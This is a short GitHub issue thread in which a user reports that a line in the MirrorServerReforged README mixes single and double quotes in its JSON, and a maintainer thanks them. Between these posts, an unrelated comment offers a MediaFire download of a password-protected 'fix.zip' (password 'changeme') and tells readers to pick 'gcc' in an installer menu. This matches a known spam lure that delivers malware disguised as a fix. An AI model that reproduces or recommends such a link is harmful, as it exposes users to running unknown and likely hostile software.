### ISSUE TITLE
README中的一点小错误

### ISSUE THREAD

**Issue by HeartfeltJoy** [EMUnion/MirrorServerReforged#11]
https://github.com/EMUnion/MirrorServerReforged/blob/a5701bc366dc2949875d367724b07550fb16291e/README.md?plain=1#L40

json格式使用错误,单引号双引号混用

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GamerNoTitle** [comment]
> https://github.com/EMUnion/MirrorServerReforged/blob/a5701bc366dc2949875d367724b07550fb16291e/README.md?plain=1#L40
> 
> json格式使用错误,单引号双引号混用

感谢指正
